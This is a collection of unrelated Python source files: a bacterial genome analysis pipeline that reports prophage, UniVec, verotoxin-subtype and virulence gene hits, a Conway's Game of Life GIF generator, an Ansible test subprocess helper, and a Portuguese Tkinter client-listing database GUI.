# relevant to this script
dictionary = pandas.read_csv(overview, sep='\t').to_dict()
# Iterate through the dictionary - each header from the excel file
for header in dictionary:
# Sample is the primary key, and value is the value of the cell for that primary key + header combo
for sample, value in dictionary[header].items():
# Update the dictionary with the new data
try:
prophagedata[sample].update({header: value})
# Create the nested dictionary if it hasn't been created yet
except KeyError:
prophagedata[sample] = dict()
prophagedata[sample].update({header: value})
for sample in self.metadata:
# Create a set to ensure that genes are only entered into the report once
genes = set()
if sample.general.bestassemblyfile != 'NA':
try:
if sample[self.analysistype].blastlist:
for result in sample[self.analysistype].blastlist:
gene = result['subject_id']
if gene not in genes:
# Iterate through the phage data in the dictionary
for query_id, phage in prophagedata.items():
if phage['id_prophage'] == gene:
# Add the data to the row
data += '{sn},{gene},{host},{ident},{cov},{contig},{start}..{stop}\n' \
.format(sn=sample.name,
gene=gene,
host=phage['host'],
ident=result['percentidentity'],
cov=result['alignment_fraction'] if float(
result['alignment_fraction']) <= 100 else '100.0',
contig=result['query_id'],
start=result['low'],
stop=result['high'])
genes.add(gene)
# Set multiple to true for any additional hits for this sample
else:
data += '{sn}\n'.format(sn=sample.name)
except AttributeError:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
report.write(data)
class Univec(BLAST):
def create_reports(self):
with open(os.path.join(self.reportpath, 'univec.csv'), 'w') as report:
data = 'Strain,Gene,Description,PercentIdentity,PercentCovered,Contig,Location\n'
for sample in self.metadata:
if sample.general.bestassemblyfile != 'NA':
# Create a set to ensure that genes are only entered into the report once
genes = set()
try:
if sample[self.analysistype].blastlist:
gene_set = set()
for result in sample[self.analysistype].blastlist:
gene_set.add(result['subject_id'])
for gene in sorted(list(gene_set)):
for result in sample[self.analysistype].blastlist:
if gene == result['subject_id']:
# Parse the reference file in order to extract the description of the BLAST hits
for entry in SeqIO.parse(sample[self.analysistype].combinedtargets, 'fasta'):
# Find the corresponding entry for the gene
if entry.id.lstrip('g') == gene:
# Cut out the description from the entry.description using regex
# e.g. 'gnl|uv|X66730.1:1-2687-49 B.bronchiseptica plasmid pBBR1 genes
# for mobilization and replication' only save the string after '2687-49'
description = re.findall('\d+-\d+\s(.+)', entry.description)[0]
# Replace commas with semicolons
description = description.replace(',', ';')
# Don't add the same gene more than once to the report
if gene not in genes:
data += '{sn},{gene},{desc},{pi},{pc},{cont},{start}..{stop}\n' \
.format(sn=sample.name,
gene=gene.split('|')[-1],
desc=description,
pi=result['percentidentity'],
pc=result['alignment_fraction'] if float(
result['alignment_fraction']) <= 100 else '100.0',
cont=result['query_id'],
start=result['low'],
stop=result['high'])
# Add the gene name to the set
genes.add(gene)
else:
data += '{sn}\n'.format(sn=sample.name)
except AttributeError:
data += '{sn}\n'.format(sn=sample.name)
else:
data += '{sn}\n'.format(sn=sample.name)
report.write(data)
class Verotoxin(KMA):
def main(self):
self.targets()
self.index_targets()
self.load_kma_db()
self.run_kma_mem_mode()
self.run_kma()
self.unload_kma_db()
self.parse_kma_outputs()
self.verotoxin_subtyping()
self.reporter()
self.kma_report()
def verotoxin_subtyping(self):
"""
Use the virulence results to perform verotoxin subtyping analyses
"""
logging.info('Performing verotoxin subtyping')
for sample in self.runmetadata.samples:
sample[self.analysistype].verotoxin_subtypes = dict()
sample[self.analysistype].verotoxin_subtypes_set = set()
sample[self.analysistype].verotoxindict = dict()
if sample[self.analysistype].kmaresults:
# If there are many results for a sample, don't write the sample name in each line of the report
for name, identity in sorted(sample[self.analysistype].kmaresults.items()):
if 'stx' in name:
try:
if ':' in name:
gene, allele, accession, subtype = name.split(':')
else:
gene, accession, subtype = name.split('_')
# Split off the 'stx' from the name
gene_type = gene.split('stx')[-1]
self.dictionary_populate(sample=sample,
gene_type=gene_type,
subtype=subtype,
identity=identity)
# Ignore entries without a subtype
except ValueError:
pass
# Perform subtyping - iterate through the three categories of verotoxin genes: vtx1 and vtx2 with
# subunits, and vtx2 without a subunit
for a_subunit in ['1A', '2A', '2']:
# Use the subunit name to set the name of the B subunit
b_subunit = a_subunit.replace('A', 'B')
# Determine whether the verotoxin gene is vtx1 or vtx2
verotoxin_gene = a_subunit[0]
# If the sample lacks a particular verotoxin subunit, a KeyError will occur. This is fine. Not
# all samples have any/all verotoxin subunits
try:
for subtype, percent_id in sorted(sample[self.analysistype].verotoxindict[a_subunit].items()):
# Create a string to with the desired output name of the gene/subtype
vtx_gene = 'vtx{gene}{subtype}'.format(gene=verotoxin_gene,
subtype=subtype)
# The subunit-less '2' verotoxin gene needs special treatment
if a_subunit != '2':
try:
# Populate the dictionary with the verotoxin gene: (subunit A %ID, subunit B %ID)
# e.g. vtx2A: (100.0, 100.0)
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = \
(percent_id,
sample[self.analysistype].verotoxindict[b_subunit][subtype])
# Add the verotoxin gene to the set of sample subtypes
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
except KeyError:
# There are no 2B genes present in the database for subtype vtx2b, allow a match
# for this subtype if only the '2A' gene is present
if a_subunit == '2A' and subtype == 'b':
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = (percent_id,)
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
else:
# Only add the results from the subunit-less gene if it is the only match for that
# subtype. e.g. if vtx2b already is present in the dictionary, do not look at the hits
# for it again
if vtx_gene not in sample[self.analysistype].verotoxin_subtypes:
sample[self.analysistype].verotoxin_subtypes[vtx_gene] = (percent_id,)
sample[self.analysistype].verotoxin_subtypes_set.add(vtx_gene)
except KeyError:
pass
# Create a string summarizing the verotoxin subtypes present. Create a semi-colon-separated list of the
# sorted subtypes e.g. vtx1a;vtx2a;vtx2c if there were subtypes detected. Otherwise, set the subtype
# to 'ND'
sample[self.analysistype].verotoxin_subtypes_set = \
';'.join(sorted(sample[self.analysistype].verotoxin_subtypes_set)) \
if sample[self.analysistype].verotoxin_subtypes_set else 'ND'
# If there are no results, set the profile to 'ND'
else:
sample[self.analysistype].verotoxin_subtypes_set = 'ND'
def dictionary_populate(self, sample, gene_type, subtype, identity):
"""
Populate the supplied nested dictionary with the necessary values. Initialise the dictionary as required
"""
if gene_type not in sample[self.analysistype].verotoxindict:
sample[self.analysistype].verotoxindict[gene_type] = dict()
if subtype not in sample[self.analysistype].verotoxindict[gene_type]:
sample[self.analysistype].verotoxindict[gene_type].update({subtype: identity})
if identity > sample[self.analysistype].verotoxindict[gene_type][subtype]:
sample[self.analysistype].verotoxindict[gene_type][subtype] = identity
def reporter(self):
"""
Create a summary report of the verotoxin subtyping
"""
logging.info('Creating verotoxin subtyping summary report')
# Initialise a string with the report headers
data = 'Strain,ToxinProfile\n'
# Set the name of the summary report
report = os.path.join(self.reportpath, 'verotoxin_summary.csv')
with open(report, 'w') as summary:
for sample in self.runmetadata.samples:
# Store the subtype string for each sample
data += '{sn},{subtypes}\n'.format(sn=sample.name,
subtypes=sample[self.analysistype].verotoxin_subtypes_set)
# Write the string to the report
summary.write(data)
class Virulence(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
vir_report = os.path.join(self.reportpath, 'virulence.csv')
if os.path.isfile(vir_report):
self.report_parse(vir_report)
else:
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
Sippr(inputobject=self,
cutoff=self.cutoff,
k=19,
allow_soft_clips=True)
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def report_parse(self, vir_report):
"""
Parse and existing report, and extract the results
:param vir_report: type STR: Name and absolute path of the report
"""
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].results = dict()
sample[self.analysistype].avgdepth = dict()
with open(vir_report, 'r') as report:
next(report)
for line in report:
try:
strain, gene, allele, description, accession, perc_ident, fold_cov = line.rstrip().split(',')
if sample.name in line:
if strain:
name = '{gene}_{accession}_{allele}'.format(gene=gene,
accession=accession,
allele=allele)
sample[self.analysistype].results[name] = perc_ident
sample[self.analysistype].avgdepth[name] = fold_cov
except ValueError:
pass
def reporter(self):
"""
Creates a report of the results
"""
# Create a set of all the gene names without alleles or accessions e.g. sul1_18_AY260546 becomes sul1
genedict = dict()
# Load the notes file to a dictionary
notefile = os.path.join(self.targetpath, 'notes.txt')
with open(notefile, 'r') as notes:
for line in notes:
# Ignore comment lines - they will break the parsing
if line.startswith('#'):
continue
# Split the line on colons e.g. stx1Aa: Shiga toxin 1, subunit A, variant a: has three variables after
# the split: gene(stx1Aa), description(Shiga toxin 1, subunit A, variant a), and _(\n)
try:
gene, description, _ = line.split(':')
# There are exceptions to the parsing. Some lines only have one :, while others have three. Allow for
# these possibilities.
except ValueError:
try:
gene, description = line.split(':')
except ValueError:
gene, description, _, _ = line.split(':')
# Set up the description dictionary
genedict[gene] = description.replace(', ', '_').strip()
# Find unique gene names with the highest percent identity
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
# Initialise a dictionary to store the unique genes, and their percent identities
sample[self.analysistype].uniquegenes = dict()
for name, identity in sample[self.analysistype].results.items():
# Split the name of the gene from the string e.g. stx1:11:Z36899:11 yields stx1
if ':' in name:
sample[self.analysistype].delimiter = ':'
else:
sample[self.analysistype].delimiter = '_'
genename = name.split(sample[self.analysistype].delimiter)[0]
# Set the best observed percent identity for each unique gene
try:
# Pull the previous best identity from the dictionary
bestidentity = sample[self.analysistype].uniquegenes[genename]
# If the current identity is better than the old identity, save it
if float(identity) > float(bestidentity):
sample[self.analysistype].uniquegenes[genename] = float(identity)
# Initialise the dictionary if necessary
except KeyError:
sample[self.analysistype].uniquegenes[genename] = float(identity)
except AttributeError:
raise
# Create the path in which the reports are stored
make_path(self.reportpath)
# Initialise strings to store the results
data = 'Strain,Gene,Subtype/Allele,Description,Accession,PercentIdentity,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
# If there are many results for a sample, don't write the sample name in each line of the report
for name, identity in sorted(sample[self.analysistype].results.items()):
# Check to see which delimiter is used to separate the gene name, allele, accession, and
# subtype information in the header
if len(name.split(sample[self.analysistype].delimiter)) == 4:
# Split the name on the delimiter: stx2A:63:AF500190:d; gene: stx2A, allele: 63,
# accession: AF500190, subtype: d
genename, allele, accession, subtype = name.split(sample[self.analysistype].delimiter)
elif len(name.split(sample[self.analysistype].delimiter)) == 3:
# Treat samples no subtype e.g. icaC:intercellular adhesion protein C: differently.
# Extract the allele as the 'subtype', and the gene name, and accession as above
genename, subtype, accession = name.split(sample[self.analysistype].delimiter)
else:
genename = name
subtype = ''
accession = ''
# Retrieve the best identity for each gene
percentid = sample[self.analysistype].uniquegenes[genename]
# If the percent identity of the current gene matches the best percent identity, add it to
# the report - there can be multiple occurrences of genes e.g.
# sul1,1,AY224185,100.00,840 and sul1,2,CP002151,100.00,927 are both included because they
# have the same 100% percent identity
if float(identity) == percentid:
# Treat the initial vs subsequent results for each sample slightly differently - instead
# of including the sample name, use an empty cell instead
try:
description = genedict[genename]
except KeyError:
description = 'ND'
# Populate the results
data += '{samplename},{gene},{subtype},{description},{accession},{identity},{depth}\n' \
.format(samplename=sample.name,
gene=genename,
subtype=subtype,
description=description,
accession=accession,
identity=identity,
depth=sample[self.analysistype].avgdepth[name])
else:
data += sample.name + '\n'
except (KeyError, AttributeError):
data += sample.name + '\n'
# Write the strings to the file
report.write(data)
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait,
allow_soft_clips=False):
self.runmetadata = args.runmetadata
self.path = os.path.join(args.path)
try:
self.targetpath = os.path.join(args.targetpath, analysistype)
except AttributeError:
self.targetpath = os.path.join(args.reffilepath, analysistype)
self.logfile = args.logfile
self.cpus = args.cpus
super().__init__(self, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline,
revbait, allow_soft_clips)
self.runner()
|
python
|
'''
MIT License
Copyright (c) 2020 Georg Thurner
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
#20 Conway’s Game of life (1000 points) Prepare a script running a simulation of the “Conway’s Game of life” for 1000 steps on a board N × N initially filled randomly with a probability p and for a number of steps M . The variables N , p and M are provided by the user. Use periodic boundary conditions. The output should be an animated GIF. Prepare a script providing also two animated GIFs for the Gosper glider gun and the Simkin glider gun on a board N × N for a number of steps M .
import numpy as np
import time
import itertools
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from progress.bar import IncrementalBar
from PIL import Image
class InputError(Exception):
'''
Additional exception that can be raised to hint at wrong input.
Takes and returns expression(where the Error occurs) and message.
'''
def __init__(self, expression, message):
self.expression = expression
self.message = message
class Conways_Game_Of_Life:
'''
Conways game of life.
Object consists of a board saved as numpy array
Initialisation can either be done via 2d arraylike input as start_conf or via a given boardsize
If boardsize is given and p_life is given, cells life with this probability, if not initialised with zeros
'''
def __init__(self,boardsize = None, start_conf = None, p_life = None):
if boardsize == None and start_conf == None:
raise InputError("__init__","Expect either a tuple for boardsize or a 2dim arraylike for start_conf")
elif boardsize != None and start_conf != None:
raise InputError("__init__","Expect only either boardsize or start_conf")
elif boardsize != None:
self.height = boardsize[0]
self.length = boardsize[1]
if p_life != None:
board = []
for i in range(self.height * self.length):
board.append(np.random.choice(2,p = [1-p_life,p_life]))
self.board = np.array(board).reshape((self.height,self.length))
else:
self.board = np.zeros(shape = [self.height,self.length],dtype='int')
else:
self.board = np.array(start_conf)
self.height = self.board.shape[0]
self.length = self.board.shape[1]
def __str__(self):
return(np.array_str(self.board))
def evolution_step(self):
'''Computes the next evoulutionstep an returns it'''
#Returns matrix where for each index all eigth corresponding neighbourcells are added up at the given index
added_ngbh = sum(np.roll(np.roll(self.board,i,0),j,1) for i,j in itertools.product((-1,0,1),(-1,0,1)) if(i != 0 or j != 0))
#Use bitwise operation to return elementwise 0 and 1
return (self.board & (added_ngbh == 2)) | (added_ngbh == 3)
def create_gif(self, steps, milsec_per_frame = 50, gif_name = 'ConwaysGameOfLife', dpi = 80):
'''
Creates a gif with x steps from the given start setup
milsec_per_frame: time each step is displayed in milliseconds; defaults to 50
gif_name: sets the name of the outputfile; defaults to 'ConwaysGameOfLife'
dpi: "Clear"; defaults to 80
'''
original_board = self.board
bar = IncrementalBar('Processing: '+gif_name, max=steps+1, suffix= '%(percent)d%%')
def update(i):
self.board = self.evolution_step()
img.set_data(self.board)
ax.set_axis_off()
bar.next()
fig, ax = plt.subplots()
img = ax.imshow(self.board,cmap = "Greys")
anim = animation.FuncAnimation(fig, update, frames=np.arange(0, steps), interval=milsec_per_frame)
anim.save( (gif_name +'.gif'), dpi=dpi, writer='imagemagick')
plt.close()
bar.finish()
self.board = original_board
def insert_construct(self,construct, coord):
'''
Inserts a given 2d array like construct at the given coord(tuple)
starting counting by 0 (coord refer to the left upper entry)
'''
#One could catch "thousnds" of possible errors or rely on an intelligent User(only 0 and 1 in matrix right sizes etc)"
construct = np.array(construct) #e.g. prevent indexing errors if list of list were given
self.board[np.ix_(range(coord[0],construct.shape[0]+coord[0]), range(coord[1],construct.shape[1]+coord[1]))] = construct
gosper_glidergun = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],[1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
simkin_glidergun = [[1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0]]
glider_death = [[1,1,0,0],[1,0,0,0],[0,1,1,1],[0,0,0,1]]
rand_game_of_life = Conways_Game_Of_Life(boardsize = (100,100), p_life = 0.6)
rand_game_of_life.create_gif(100,milsec_per_frame = 10)
glidergun1 = Conways_Game_Of_Life(boardsize = (100,100))
glidergun1.insert_construct(gosper_glidergun,(0,0))
glidergun1.insert_construct(glider_death,(80,93))
glidergun1.create_gif(2000, gif_name = "gosper_glidergun")
glidergun2 = Conways_Game_Of_Life(boardsize = (100,100))
glidergun2.insert_construct(simkin_glidergun,(20,20))
glidergun2.create_gif(1000,gif_name = "simkin_glidergun",milsec_per_frame = 20)
|
python
|
import subprocess
import re
def subprocess_runner(cmd_list, exercise_dir):
with subprocess.Popen(
cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=exercise_dir
) as proc:
std_out, std_err = proc.communicate()
return (std_out.decode(), std_err.decode(), proc.returncode)
def remove_ansible_warnings(output, warning_list=None):
"""Remove the specified warnings from std_err."""
if warning_list is None:
warning_list = [
r"^.WARNING.: Ignoring timeout.10. for .*$",
]
# Remove warnings one at a time from std_err
for ansible_warn in warning_list:
output = re.sub(ansible_warn, "", output, flags=re.M)
return output.strip()
|
python
|
import os
import time
import math
from tkinter import *
import tkinter.ttk as ttk
from ClientEdit import *
from ClientInsert import *
from ClientView import *
class ClientList(Tk):
def label_combo(self, text, frame=None):
if frame == None:
frame = self.__frame_border
frame = Frame(frame)
label = Label(frame, text=text)
combobox = ttk.Combobox(frame, state='readonly')
label.grid(row=0, column=0)
combobox.grid(row=0, column=1)
return [frame, combobox]
def __init__(self, db):
super().__init__()
if os.name == 'nt':
self.geometry("{}x{}+{}+{}".format(
1008, 590,
self.winfo_screenwidth()//2 - 1085//2,
self.winfo_screenheight()//2 - 590//2
)
)
else:
self.geometry("{}x{}+{}+{}".format(
1085, 590,
self.winfo_screenwidth()//2 - 1085//2,
self.winfo_screenheight()//2 - 590//2
)
)
self.__db = db
self.title("Listagem de Clientes")
self.resizable(False, False)
self.__frame_border = Frame(self)
self.__label_pesquisa = Label(self.__frame_border,
text="Pesquisa:")
self.__label_pesquisa.grid(row=0, column=0, stick='w')
self.__entry_pesquisa = Entry(self.__frame_border)
self.__entry_pesquisa.grid(row=1, column=0, stick='ew')
self.__entry_pesquisa.focus()
self.__frame_row2 = Frame(self.__frame_border)
tmp = self.label_combo("Pesquisar por:", self.__frame_row2)
self.__frame_selecao_pesquisa = tmp[0]
self.__combo_selecao_pesquisa = tmp[1]
self.__combo_selecao_pesquisa['values'] = ["Razão Social", "CNPJ"]
self.__combo_selecao_pesquisa.current(0)
self.__frame_selecao_pesquisa.grid(row=0, column=0, stick='w', pady=4)
tmp = self.label_combo("Ordem:", self.__frame_row2)
self.__frame_ordem = tmp[0]
self.__combo_ordem = tmp[1]
self.__combo_ordem['values'] = ["Crescente", "Decrescente"]
self.__combo_ordem.current(0)
self.__frame_ordem.grid(row=0, column=1, stick='w', pady=4)
self.__button_filtrar = Button(self.__frame_row2, text='Filtrar',
command=self.filter_client)
self.__button_filtrar.grid(row=0, column=2, stick='e')
self.__frame_row2.grid_columnconfigure(index=2, weight=1)
self.__frame_row2.grid(row=2, column=0, stick='ew')
self.__frame_row3 = Frame(self.__frame_border)
campo_values = [
"Razão Social",
"Nome Fantasia",
"CNPJ",
"Inscrição Estadual",
"Inscrição Municipal",
"Logradouro",
"Complemento",
"Bairro",
"Municipio",
"UF",
"CEP",
"Telefone",
"Celular",
"E-mail",
"URL"]
tmp = self.label_combo("Campo 1:", self.__frame_row3)
self.__frame_campo_1 = tmp[0]
self.__combo_campo_1 = tmp[1]
self.__combo_campo_1['values'] = campo_values
self.__combo_campo_1.current(0)
self.__frame_campo_1.grid(row=0, column=0, stick='ew', pady=4)
tmp = self.label_combo("Campo 2:", self.__frame_row3)
self.__frame_campo_2 = tmp[0]
self.__combo_campo_2 = tmp[1]
self.__combo_campo_2['values'] = campo_values
self.__combo_campo_2.current(1)
self.__frame_campo_2.grid(row=0, column=1, stick='ew', pady=4)
tmp = self.label_combo("Campo 3:", self.__frame_row3)
self.__frame_campo_3 = tmp[0]
self.__combo_campo_3 = tmp[1]
self.__combo_campo_3['values'] = campo_values
self.__combo_campo_3.current(2)
self.__frame_campo_3.grid(row=0, column=2, stick='ew', pady=4)
tmp = self.label_combo("Campo 4:", self.__frame_row3)
self.__frame_campo_4 = tmp[0]
self.__combo_campo_4 = tmp[1]
self.__combo_campo_4['values'] = campo_values
self.__combo_campo_4.current(3)
self.__frame_campo_4.grid(row=0, column=3, stick='ew', pady=4)
tmp = self.label_combo("Página:", self.__frame_row3)
self.__frame_pagina = tmp[0]
self.__combo_pagina = tmp[1]
self.__str_pagina = StringVar()
self.__combo_pagina['textvariable'] = self.__str_pagina
self.__combo_pagina['values'] = ["0"]
self.__combo_pagina.current(0)
self.__str_pagina.trace("w", self.__change_pagina)
self.__frame_pagina.grid(row=0, column=4, stick='ew', pady=4)
self.__frame_row3.grid(row=3, column=0)
self.__tree = ttk.Treeview(self.__frame_border, height=21)
self.__tree["columns"] = (1, 2, 3, 4)
self.__tree["show"] = "headings"
self.__tree.heading(1, text="Razão Social")
self.__tree.heading(2, text="Nome Fantasia")
self.__tree.heading(3, text="CNPJ")
self.__tree.heading(4, text="Inscrição Estadual")
self.__tree.column(1, width=200)
self.__tree.column(2, width=200)
self.__tree.column(3, width=200)
self.__tree.column(4, width=200)
self.__tree.grid(row=4, column=0, stick='ew')
self.__tree.bind('<Button-1>', self.__handle_click)
self.__frame_row5 = Frame(self.__frame_border)
self.__button_inserir = Button(self.__frame_row5, text='Inserir',
command=self.__insert_client)
self.__button_editar = Button(self.__frame_row5, text='Editar',
command=self.__edit_client)
self.__button_consultar = Button(self.__frame_row5, text='Consultar',
command=self.__view_client)
self.__button_deletar = Button(self.__frame_row5, text='Deletar',
command=self.__delete_client)
self.__button_inserir.grid(row=0, column=0, stick='e', padx=4)
self.__button_editar.grid(row=0, column=1, stick='e', padx=4)
self.__button_consultar.grid(row=0, column=2, stick='e', padx=4)
self.__button_deletar.grid(row=0, column=3, stick='e', padx=4)
self.__frame_row5.grid_columnconfigure(index=0, weight=1)
self.__frame_row5.grid_columnconfigure(index=1, weight=0)
self.__frame_row5.grid_columnconfigure(index=2, weight=0)
self.__frame_row5.grid_columnconfigure(index=3, weight=0)
self.__frame_row5.grid(row=5, column=0, stick='ew', pady=4)
self.__frame_border.grid(row=0, column=0,
stick='ew', padx=10, pady=10)
self.filter_client()
def __handle_click(self, event):
if self.__tree.identify_region(event.x, event.y) == "separator":
return "break"
def __combo_to_database(self, value):
if value == "Razão Social":
return "rsocial_cliente"
if value == "Nome Fantasia":
return "nfantasia_cliente"
if value == "CNPJ":
return "cnpj_cliente"
if value == "Inscrição Estadual":
return "iestadual_cliente"
if value == "Inscrição Municipal":
return "imunicipal_cliente"
if value == "Logradouro":
return "logradouro_cliente"
if value == "Complemento":
return "complemento_cliente"
if value == "Bairro":
return "bairro_cliente"
if value == "CEP":
return "cep_cliente"
if value == "Celular":
return "ncel_cliente"
if value == "Telefone":
return "numero_telefone"
if value == "Municipio":
return "nome_municipio"
if value == "UF":
return "nome_uf"
if value == "URL":
return "url_cliente"
if value == "E-mail":
return "email_cliente"
def __format_result(self, name, value):
if name == "cnpj_cliente":
value = str(value)
return value[:2] + "." + value[2:5] + "." + value[5:8] + "/" + value[8:12] + "." + value[12:15]
if name == "iestadual_cliente":
value = str(value)
return value[:3] + "." + value[3:6] + "." + value[6:9] + "." + value[9:]
if name == "imunicipal_cliente":
value = str(value)
return value[:1] + "." + value[1:4] + "." + value[4:7] + "-" + value[7:]
if name == "cep_cliente":
value = str(value)
return value[:5] + "-" + value[5:]
if name == "numero_telefone":
tmp = ""
print(value)
for element in value:
if (int(element["numero_telefone"]) != 0 and
int(element["ddd_telefone"]) != 0):
tmp += "(" + str(element["ddd_telefone"]) + ") "
tmp += str(element["numero_telefone"])[:4] + "-"
tmp += str(element["numero_telefone"])[4:] + "; "
if tmp[-1] == " " and tmp[-2] == ";":
tmp = tmp[:-2]
return tmp
if name == "ncel_cliente":
value = str(value)
return value[:1] + " " + value[1:5] + "-" + value[5:]
if name == "ddd_cel_cliente":
value = str(value)
return "(" + value[:2] + ") "
value = str(value)
return value
def __general_client_query(self, field):
campo_pesquisa = self.__combo_to_database(self.__combo_selecao_pesquisa.get())
campo_ordem = "ASC" if self.__combo_ordem.get() == "Crescente" else "DESC"
if len(self.__entry_pesquisa.get()) == 0:
table = self.__db.select("CLIENTE", [field],
order_by=campo_pesquisa + " " + campo_ordem)
else:
table = self.__db.select("CLIENTE",
[field],
[campo_pesquisa],
[self.__entry_pesquisa.get()],
like=True,
order_by=campo_pesquisa + " " + campo_ordem)
if (field == "cnpj_cliente" or field == "iestadual_cliente" or
field == "imunicipal_cliente" or field == "cep_cliente"):
for i in range(len(table)):
zeroes_to_add = 0
if field == "cnpj_cliente":
if len(str(table[i][field])) < 14:
zeroes_to_add = 14 - len(str(table[i][field]))
elif field == "iestadual_cliente":
if len(str(table[i][field])) < 12:
zeroes_to_add = 12 - len(str(table[i][field]))
elif field == "imunicipal_cliente":
if len(str(table[i][field])) < 8:
zeroes_to_add = 8 - len(str(table[i][field]))
elif field == "cep_cliente":
if len(str(table[i][field])) < 8:
zeroes_to_add = 8 - len(str(table[i][field]))
if zeroes_to_add != 0:
for j in range(zeroes_to_add):
table[i][field] = "0" + str(table[i][field])
tmp = []
for i in range(len(table)):
tmp.append(self.__format_result(field, table[i][field]))
return tmp
def __nome_municipio_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
id_municipio_cliente = str(self.__db.select("CLIENTE",
["id_municipio_cliente"],
["id_cliente"],
[str(ident)]
)[0]["id_municipio_cliente"])
nome_municipio = str(self.__db.select("MUNICIPIO",
["nome_municipio"],
["id_municipio"],
[id_municipio_cliente])[0]["nome_municipio"])
tmp.append(nome_municipio)
return tmp
def __nome_uf_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
id_municipio_cliente = str(self.__db.select("CLIENTE",
["id_municipio_cliente"],
["id_cliente"],
[str(ident)]
)[0]["id_municipio_cliente"])
id_uf_municipio = str(self.__db.select("MUNICIPIO",
["id_uf_municipio"],
["id_municipio"],
[id_municipio_cliente])[0]["id_uf_municipio"])
